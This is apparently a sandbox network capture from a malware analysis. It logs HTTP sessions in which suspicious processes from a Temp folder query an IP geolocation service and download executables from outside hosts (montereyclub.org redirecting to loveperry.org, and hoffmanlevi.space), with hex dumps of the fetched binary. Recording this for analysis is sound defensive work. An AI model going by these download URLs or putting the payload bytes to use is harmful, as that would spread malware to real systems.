2023-10-13 13:21:07 UTC	161	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff 26 69 40 00 00 00 00 00 40 c2 59 00 00 00 00 00 40 c2 59 00 01 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000&i@@Y@Y
2023-10-13 13:21:07 UTC	169	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-10-13 13:21:07 UTC	169	IN	Data Raw: 0d 0a Data Ascii:
2023-10-13 13:21:07 UTC	169	IN	Data Raw: 32 30 30 30 0d 0a 68 97 1a 00 38 00 00 00 00 00 00 00 00 00 00 00 00 9c 1a 00 22 00 00 00 00 00 00 00 00 00 00 00 e0 b8 1a 00 30 00 00 00 00 00 00 00 00 00 00 00 c8 d5 1a 00 30 00 00 00 00 00 00 00 00 00 00 00 b0 f2 1a 00 30 00 00 00 00 00 00 00 00 00 00 00 78 38 1a 00 4c 00 00 00 00 00 00 00 00 00 00 00 00 97 1a 00 68 00 00 00 00 00 00 00 00 00 00 00 e0 f2 1a 00 78 02 00 00 00 00 00 00 00 00 00 00 28 00 00 00 30 00 00 00 60 00 00 00 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 82 80 00 85 84 79 00 82 7a 84 00 80 7c 80 00 7c 7b 7a 00 81 81 85 00 80 85 7b 00 80 7c 84 00 7d 7e 7b 00 81 7f 86 00 7e 7b 7b 00 7f 81 80 00 7e 7c 7f 00 80 81 81 00 7e 85 80 00 7e 7c 79 00 81 81 80 00 83 7a 7f 00 83 80 7c 00 7f 7a 7f 00 7d Data Ascii: 2000h8"000x8Lhx(0`yz\|\|{z{\|}~{~{{~\|~~\|yz\|z}
2023-10-13 13:21:07 UTC	177	IN	Data Raw: 83 85 7d 7f 82 83 Data Ascii: }
2023-10-13 13:21:07 UTC	177	IN	Data Raw: 0d 0a Data Ascii:
2023-10-13 13:21:07 UTC	177	IN	Data Raw: 32 30 30 30 0d 0a 7d 7f 7f 81 79 7d 83 84 7e 83 85 7b 7d 7b 80 7e 83 7e 7b 84 82 81 85 82 7f 84 84 7f 82 7f 82 81 83 83 7e 7c 83 81 84 7e 7d 7f 7e 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c 80 82 7e 7e 83 80 7b 84 7d 7b 82 84 83 85 80 83 7f 7f 80 80 80 7b 80 7c 80 84 7c 84 7d 81 82 80 7f 7c 7a 80 7e 7f 79 7d 83 7d 81 7b 83 80 82 80 7c 80 84 80 83 81 81 7e 85 7e 7c 81 83 80 7f 7e 7b 81 7d 7b 7c 80 7f 85 7e 82 81 7c 80 85 7c 7e 7d 7f 82 82 84 83 7d 7b 7b 86 7f 7a 85 7f 80 7c 7f 85 7b 7f 82 7d 84 7e 7e 85 7d 7f 7f 7d 7a 7d 84 84 84 80 7d 80 80 7e 80 84 83 85 7c 7d 7f 83 82 80 80 80 82 7e 85 83 79 81 7d 7d 82 7f 82 80 80 82 7b 7f 7d 7c 83 7f 7c 7f 7f 7d 83 7a 81 7f 7b 7d 7b 7f 80 7c 7e 83 81 7e 83 00 00 00 00 00 00 00 00 00 Data Ascii: 2000}y}~{}{~~{~\|~}~\|\|~~{}{{\|\|}\|z~y}}{\|~~\|~{}{\|~\|\|~}}{{z\|{}~~}}z}}~\|}~y}}{}\|\|}z{}{\|~~
2023-10-13 13:21:07 UTC	185	IN	Data Raw: 7d 7d 7f 7b 81 7e Data Ascii: }}{~
2023-10-13 13:21:07 UTC	185	IN	Data Raw: 0d 0a Data Ascii:
2023-10-13 13:21:07 UTC	185	IN	Data Raw: 32 30 30 30 0d 0a 7c 81 7b 81 7d 82 85 83 7f 7f 84 82 7a 7f 7c 82 86 80 84 7f 85 83 86 7f 80 7b 82 81 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7a 7f 85 7c 7d 81 80 7e 7f 7d 82 7c 84 82 80 7d 7f 7e 81 7a 80 7b 7f 7f 81 7a 7f 7e 7b 82 83 7b 7a 7f 81 83 80 81 85 7d 85 7e 86 80 7b 86 7e 7f 84 81 84 83 84 7d 7e 81 7a 7f 80 7f 7b 83 7f 7f 82 80 7a 7c 7d 7c 80 86 7f 82 80 7f 81 7e 79 79 82 84 82 7d 7b 81 7d 80 82 7d 84 7c 80 84 7e 84 81 7e 84 7f 85 82 7b 85 7b 80 7b 85 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f 80 80 80 81 7f 80 7a 7e 7c 84 82 81 7c 83 7c 7a 81 7a 79 7f 81 81 7e 80 7b 82 7e 83 7e 85 83 84 83 7f 7e 82 7c 7c 85 7b 7a 7a 7f 80 7d 81 7f 7f 7f 80 7b 7f 7f 7b 80 81 7d 82 80 81 79 7c 85 83 7a 7a 7e 82 84 7e 83 7b Data Ascii: 2000\|{}z\|{z\|}~}\|}~z{z~{{z}~{~}~z{z\|}\|~yy}{}}\|~~{{{z~\|\|\|zzy~{~~~\|\|{zz}{{}y\|zz~~{
2023-10-13 13:21:07 UTC	193	IN	Data Raw: a8 a8 a8 a8 a8 a8 Data Ascii:
2023-10-13 13:21:07 UTC	193	IN	Data Raw: 0d 0a Data Ascii:
2023-10-13 13:21:07 UTC	193	IN	Data Raw: 31 66 66 38 0d 0a ff ff ff ff ff ff 00 00 fe 00 00 00 00 1f 00 00 fc 00 00 00 00 0f 00 00 f8 00 00 00 00 0f 00 00 e0 00 00 00 00 0f 00 00 80 00 00 00 00 0f 00 00 80 00 00 00 00 0f 00 00 80 00 00 00 00 0f 00 00 80 00 00 00 00 0f 00 00 80 00 00 00 00 0f 00 00 80 00 00 00 00 0f 00 00 80 00 00 00 00 0f 00 00 80 00 00 00 00 0f 00 00 80 00 00 00 00 0f 00 00 80 00 00 00 00 0f 00 00 80 00 00 00 00 0f 00 00 80 00 00 00 00 0f 00 00 80 00 00 00 00 0f 00 00 80 00 00 00 00 0f 00 00 80 00 00 00 00 0f 00 00 80 00 00 00 00 0f 00 00 80 00 00 00 00 0f 00 00 80 00 00 00 00 0f 00 00 80 00 00 00 00 0f 00 00 80 00 00 00 00 0f 00 00 80 00 00 00 00 0f 00 00 80 00 00 00 00 0f 00 00 80 00 00 00 00 0f 00 00 80 00 00 00 00 0f 00 00 80 00 00 00 00 1f 00 00 80 00 00 00 00 ff 00 00 80 Data Ascii: 1ff8
2023-10-13 13:21:07 UTC	201	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-10-13 13:21:07 UTC	201	IN	Data Raw: 80 80 80 81 7e 81 80 80 7f 81 80 7f 7e 81 7e 80 80 7f 7f 81 7e 7f 81 80 7e 80 80 7f 80 7f 7f 7f 7f 80 7f 7f 7e 80 80 80 80 81 7f 80 80 80 80 80 80 81 81 80 7f 80 80 7f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f 81 7f 7f 81 7f 81 80 7e 7e 7f 7f 80 7e 7f 80 81 7f 7f 80 80 80 80 7f 81 7e 80 7f 80 7f 7f 80 81 7e 7e 7f 81 81 7f 7e 7f 7f 7e 80 80 80 7e 7f 7e 7f 7f 7e 7f 81 7e 7f 81 7f 80 81 81 7f 80 7e 80 80 7f 80 7f 80 7e 80 80 80 80 7f 80 81 7f 7e 80 7f 80 7f 7e 7f 7f 81 81 7f 80 80 81 7f 80 81 7e 7f 80 7f 7e 81 80 80 81 81 7e 80 80 7f 81 7f 81 7f 7f 7e 7f 7f 81 81 7f 80 7f 80 81 80 81 7e 7e 7e 7f 81 7f 7f 80 7e 7f 7f 7e 7f 7f 80 7f 7f 7f 7e 7f 80 80 7f 7f 7f 81 80 80 80 80 81 80 81 80 80 80 7f 80 7f 81 7f 7e 80 80 80 7e 80 80 7f 00 00 00 00 00 00 00 Data Ascii: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2023-10-13 13:21:07 UTC	209	IN	Data Raw: 0d 0a Data Ascii:
2023-10-13 13:21:07 UTC	209	IN	Data Raw: 32 30 30 30 0d 0a 80 80 7f 7f 80 7f 80 7f 81 7f 7f 7e 81 80 80 7f 7f 80 81 80 80 80 7f 80 81 80 7f 81 80 7e 7f 7f 7e 7e 7e 7e 7e 7f 7f 80 00 00 00 00 00 00 00 00 80 7f 7e 81 80 7e 81 81 7f 80 81 80 7f 7e 81 7f 7f 7e 80 7e 7f 80 7e 80 7e 7f 80 7f 81 7e 80 7f 80 7f 80 80 80 7f 81 7e 7e 7e 7f 80 81 80 81 80 7e 81 7f 7e 7f 81 7f 80 7f 80 80 81 7f 7f 81 7f 80 80 7e 7f 81 80 80 80 80 80 7f 7f 7f 7e 7f 80 7e 7f 80 80 80 7f 80 7f 7e 7e 7f 81 81 7f 7f 7e 80 81 7f 7e 80 80 80 7e 80 80 7e 81 7f 80 7e 81 80 81 80 7e 7f 81 7f 7e 00 00 00 00 00 00 00 00 81 80 7f 81 7f 7e 7f 7e 7e 7f 7f 81 80 80 80 80 81 7f 7f 80 80 80 80 80 7f 80 7f 80 80 81 7e 7e 80 7e 81 7f 7e 80 80 80 80 80 7f 7f 80 7e 81 7f 81 7e 81 7e 7f 80 7f 80 81 80 80 81 7f 7e 7e 80 7f 81 7f 81 7e 7f 80 7f 7f Data Ascii: 2000~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2023-10-13 13:21:07 UTC	217	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-10-13 13:21:07 UTC	217	IN	Data Raw: 0d 0a Data Ascii:
2023-10-13 13:21:08 UTC	217	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 05 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 69 69 00 00 00 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 04 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 69 69 00 00 00 00 00 00 00 00 00 00 00 00 00 69 00 00 00 00 00 00 00 00 00 00 0f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 69 69 00 00 00 00 00 00 00 00 00 00 00 00 00 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 69 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000iiiiiiiiiii
2023-10-13 13:21:08 UTC	225	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-10-13 13:21:08 UTC	225	IN	Data Raw: 0d 0a Data Ascii:
2023-10-13 13:21:08 UTC	225	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff e1 ff ff 00 00 ff ff ff e0 ff ff 00 00 ff ff ff c0 ff ff 00 00 ff ff ff c0 ff ff 00 00 ff ff ff c0 ff ff 00 00 ff ff ff 03 ff ff 00 00 ff ff bf 03 ff ff 00 00 ff Data Ascii: 2000
2023-10-13 13:21:08 UTC	233	IN	Data Raw: 40 00 00 f0 4a 00 Data Ascii: @J
2023-10-13 13:21:08 UTC	233	IN	Data Raw: 0d 0a Data Ascii:
2023-10-13 13:21:08 UTC	233	IN	Data Raw: 32 30 30 30 0d 0a 11 ff 5b 00 31 ff 71 00 51 ff 87 00 71 ff 9d 00 91 ff b2 00 b1 ff c9 00 d1 ff df 00 ff ff ff 00 00 00 00 00 02 2f 00 00 04 50 00 00 06 70 00 00 08 90 00 00 0a b0 00 00 0b cf 00 00 0e f0 00 00 20 ff 12 00 3d ff 31 00 5b ff 51 00 79 ff 71 00 98 ff 91 00 b5 ff b1 00 d4 ff d1 00 ff ff ff 00 00 00 00 00 14 2f 00 00 22 50 00 00 30 70 00 00 3d 90 00 00 4c b0 00 00 59 cf 00 00 67 f0 00 00 78 ff 11 00 8a ff 31 00 9c ff 51 00 ae ff 71 00 c0 ff 91 00 d2 ff b1 00 e4 ff d1 00 ff ff ff 00 00 00 00 00 26 2f 00 00 40 50 00 00 5a 70 00 00 74 90 00 00 8e b0 00 00 a9 cf 00 00 c2 f0 00 00 d1 ff 11 00 d8 ff 31 00 de ff 51 00 e3 ff 71 00 e9 ff 91 00 ef ff b1 00 f6 ff d1 00 ff ff ff 00 00 00 00 00 2f 26 00 00 50 41 00 00 70 5b 00 00 90 74 00 00 b0 8e 00 00 cf Data Ascii: 2000[1qQq/Pp =1[Qyq/"P0p=LYgx1Qq&/@PZpt1Qq/&PAp[t
2023-10-13 13:21:08 UTC	241	IN	Data Raw: 00 00 00 00 00 00 Data Ascii:
2023-10-13 13:21:08 UTC	241	IN	Data Raw: 0d 0a Data Ascii:
2023-10-13 13:21:08 UTC	241	IN	Data Raw: 31 61 31 38 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 1a18

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49732	172.67.139.220	443	C:\Users\user\AppData\Local\Temp\958B.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-13 13:21:06 UTC	15	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-10-13 13:21:07 UTC	95	IN	HTTP/1.1 429 Too Many Requests Date: Fri, 13 Oct 2023 13:21:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YSvnymR1hwAntaRPWW5B5cZzNLQhWzlGIBT%2Benkh2Pzh4quK%2FIKe%2B4QQIZ1YrQZAtTRM%2Bt6DrR3kJepIXQP1tsRxJH0yQdPycqDwBQSHfUhjOykFKfHvNGGgNpPy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8157e240a85b5287-LAX alt-svc: h3=":443"; ma=86400
2023-10-13 13:21:07 UTC	96	IN	Data Raw: 33 32 66 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 39 33 66 62 66 36 66 66 65 33 64 33 61 31 66 61 65 33 62 64 66 65 66 36 61 63 65 30 65 36 66 31 66 39 66 36 66 30 Data Ascii: 32f<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#93fbf6ffe3d3a1fae3bdfef6ace0e6f1f9f6f0
2023-10-13 13:21:07 UTC	96	IN	Data Raw: ba 20 d0 b1 d0 b0 d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 64 62 62 33 62 65 62 37 61 62 39 62 65 39 62 32 61 62 66 35 61 65 62 61 65 34 61 38 61 65 62 39 62 31 62 65 62 38 61 66 65 36 65 39 62 32 61 62 66 35 61 65 62 61 Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#dbb3beb7ab9be9b2abf5aebae4a8aeb9b1beb8afe6e9b2abf5aeba
2023-10-13 13:21:07 UTC	97	IN	Data Raw: 36 63 0d 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a Data Ascii: 6c<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script>
2023-10-13 13:21:07 UTC	97	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.5	49737	172.67.196.133	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-13 13:21:09 UTC	247	OUT	GET /288c47bbc1871b439df19ff4df68f076.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: montereyclub.org
2023-10-13 13:21:10 UTC	248	IN	HTTP/1.1 307 Temporary Redirect Date: Fri, 13 Oct 2023 13:21:10 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Location: https://loveperry.org/55945f02f36a77ce7ed6ee14da31275f/288c47bbc1871b439df19ff4df68f076.exe CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1XgZGdnaVkQOKbfe9kR9VBkSrmouHF5oPNU1w%2FTpBCLTlaN6LN%2Fopm4yhDB7hzchQa6ve4v%2F%2F8Km3cvH61POYkzk3kU4Ve0mxnlPA5vT8BGVZj1K20D0rdjaTgBZ9oBd7e4K"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8157e254aabb08ac-LAX alt-svc: h3=":443"; ma=86400
2023-10-13 13:21:10 UTC	248	IN	Data Raw: 37 66 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 76 65 70 65 72 72 79 2e 6f 72 67 2f 35 35 39 34 35 66 30 32 66 33 36 61 37 37 63 65 37 65 64 36 65 65 31 34 64 61 33 31 32 37 35 66 2f 32 38 38 63 34 37 62 62 63 31 38 37 31 62 34 33 39 64 66 31 39 66 66 34 64 66 36 38 66 30 37 36 2e 65 78 65 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a 0d 0a Data Ascii: 7f<a href="https://loveperry.org/55945f02f36a77ce7ed6ee14da31275f/288c47bbc1871b439df19ff4df68f076.exe">Temporary Redirect</a>.
2023-10-13 13:21:10 UTC	248	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.5	49736	45.130.41.106	443	C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-13 13:21:11 UTC	248	OUT	GET /385119/setup.exe HTTP/1.1 Host: hoffmanlevi.space Connection: Keep-Alive
2023-10-13 13:21:12 UTC	249	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Fri, 13 Oct 2023 13:21:11 GMT Content-Type: application/octet-stream Content-Length: 7499856 Last-Modified: Fri, 13 Oct 2023 04:39:39 GMT Connection: close ETag: "6528ca0b-727050" Expires: Sun, 12 Nov 2023 13:21:11 GMT Cache-Control: max-age=2592000 Accept-Ranges: bytes
2023-10-13 13:21:12 UTC	249	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd e1 1d 57 99 80 73 04 99 80 73 04 99 80 73 04 1a 9c 7d 04 80 80 73 04 af a6 79 04 d9 80 73 04 17 88 2c 04 98 80 73 04 99 80 72 04 21 80 73 04 1a 88 2e 04 90 80 73 04 af a6 78 04 d4 80 73 04 f6 f6 d9 04 9e 80 73 04 f6 f6 ed 04 98 80 73 04 5e 86 75 04 98 80 73 04 52 69 63 68 99 80 73 04 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f7 53 e5 4c 00 00 00 00 00 00 00 00 e0 00 0f Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Wsss}sys,sr!s.sxsss^usRichsPELSL
2023-10-13 13:21:12 UTC	265	IN	Data Raw: 01 00 00 66 83 7c 71 fe 3a 0f 84 f4 00 00 00 8d 45 d0 56 50 8d 4d e8 e8 6f d3 ff ff 50 8d 4d e8 c6 45 fc 03 e8 a2 d2 ff ff c6 45 fc 01 ff 75 d0 e8 b8 ef ff ff 59 e9 73 ff ff ff 8d 4d c0 e8 ef e3 ff ff ff 75 e8 8d 4d 98 c6 45 fc 02 e8 40 0d 00 00 84 c0 75 04 b3 01 eb 0c 8b 45 b8 c1 e8 04 a8 01 75 22 32 db ff 75 c0 e8 7f ef ff ff ff 75 dc e8 77 ef ff ff ff 75 e8 e8 6f ef ff ff 83 c4 0c e9 92 00 00 00 ff 75 c0 c6 45 fc 01 e8 5b ef ff ff 59 8d 45 dc 8d 4d e8 50 e8 2c d2 ff ff 3b 75 ec 0f 8d 81 00 00 00 8b 55 e8 8d 44 72 02 66 8b 08 66 3b cf 74 09 66 85 c9 74 0c 40 40 eb ef 2b c2 d1 f8 8b f0 eb 03 83 ce ff 85 f6 7d 03 8b 75 ec 8d 45 d0 56 50 8d 4d e8 e8 ac d2 ff ff 8b 08 c6 45 fc 04 e8 03 fe ff ff 8a d8 c6 45 fc 01 ff 75 d0 f6 db 1a db fe c3 e8 ef ee ff ff 84 Data Ascii: f\|q:EVPMoPMEEuYsMuME@uEu"2uuwuouE[YEMP,;uUDrff;tft@@+}uEVPMEEu
2023-10-13 13:21:12 UTC	340	IN	Data Raw: 8d 8d 4c ff ff ff e8 e6 03 00 00 ff 75 18 8d 8d 50 ff ff ff 89 5d fc e8 af 92 ff ff ff 75 1c 8d 8d 4c ff ff ff 89 bd 6c ff ff ff ff 75 14 ff 75 10 ff 75 dc ff 75 08 e8 17 fe ff ff 8b f0 3b f3 0f 85 f3 01 00 00 8b 4d e0 8d 85 4c ff ff ff 50 e8 ec 08 00 00 8d 8d 4c ff ff ff 89 7d fc e8 b0 ad ff ff e9 56 ff ff ff 8b 45 e0 66 89 5d c8 66 89 5d ca 8b 40 0c 8b 74 88 fc 8b 06 8d 7d c8 57 52 8b 08 50 89 55 fc ff 51 20 3b c3 0f 85 ba 01 00 00 66 83 7d c8 13 0f 85 29 03 00 00 8b 06 8b 7d d0 8d 55 c4 8b 08 52 50 ff 51 14 3b c3 0f 85 98 01 00 00 3b 7d c4 0f 83 09 03 00 00 83 4d fc ff 8d 4d c8 e8 bc d2 ff ff 89 5d f0 8b 06 8d 55 f0 52 68 28 b2 41 00 8b 08 50 c7 45 fc 02 00 00 00 ff 11 85 c0 8b 45 f0 0f 85 cf 02 00 00 3b c3 0f 84 c7 02 00 00 89 5d ec 8b 08 8d 55 ec 52 Data Ascii: LuP]uLluuuu;MLPL}VEf]f]@t}WRPUQ ;f})}URPQ;;}MM]URh(APEE;]UR
2023-10-13 13:21:12 UTC	356	IN	Data Raw: f1 33 c0 89 75 f0 c7 06 c4 b7 41 00 89 46 04 89 46 08 8d 4e 10 89 45 fc e8 a0 02 00 00 8b 4d f4 c7 06 90 b7 41 00 c7 86 e0 01 00 00 04 00 00 00 8b c6 5e 64 89 0d 00 00 00 00 c9 c3 55 8b ec 6a 10 68 4c b9 41 00 ff 75 0c e8 d3 69 00 00 83 c4 0c 85 c0 74 16 6a 10 68 08 b2 41 00 ff 75 0c e8 bd 69 00 00 83 c4 0c 85 c0 75 12 8b 4d 10 8b 45 08 50 89 01 8b 08 ff 51 04 33 c0 eb 05 b8 02 40 00 80 5d c2 0c 00 56 8b 74 24 08 ff 4e 04 8b 46 04 75 14 85 f6 74 0e 8b ce e8 0d 00 00 00 56 e8 49 6f ff ff 59 33 c0 5e c2 04 00 b8 5f a3 41 00 e8 f0 6d 00 00 51 56 8b f1 89 75 f0 83 65 fc 00 8d 4e 10 e8 1e 00 00 00 8b 76 08 83 4d fc ff 85 f6 74 06 8b 06 56 ff 50 08 8b 4d f4 5e 64 89 0d 00 00 00 00 c9 c3 b8 ac a3 41 00 e8 b5 6d 00 00 51 56 8b f1 89 75 f0 8d 8e ac 01 00 00 c7 45 Data Ascii: 3uAFFNEMA^dUjhLAuitjhAuiuMEPQ3@]Vt$NFutVIoY3^_AmQVueNvMtVPM^dAmQVuE
